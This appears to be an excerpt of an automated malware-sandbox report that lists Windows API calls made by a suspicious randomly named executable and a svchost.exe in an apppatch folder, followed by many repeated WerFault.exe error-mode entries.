Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0124BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0124BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,7_2_0104C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,7_2_0104C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,7_2_0104C380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,7_2_0104BDD0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01048F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,7_2_01048F20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,7_2_0104BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,7_2_0104BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,7_2_0104BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,7_2_0104BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_00A2C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_00A2C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,9_2_00A2C380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,9_2_00A2BDD0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_00A2BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_00A2BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_00A2BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_00A2BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A28F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,9_2_00A28F20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C844F0 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02C844F0
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
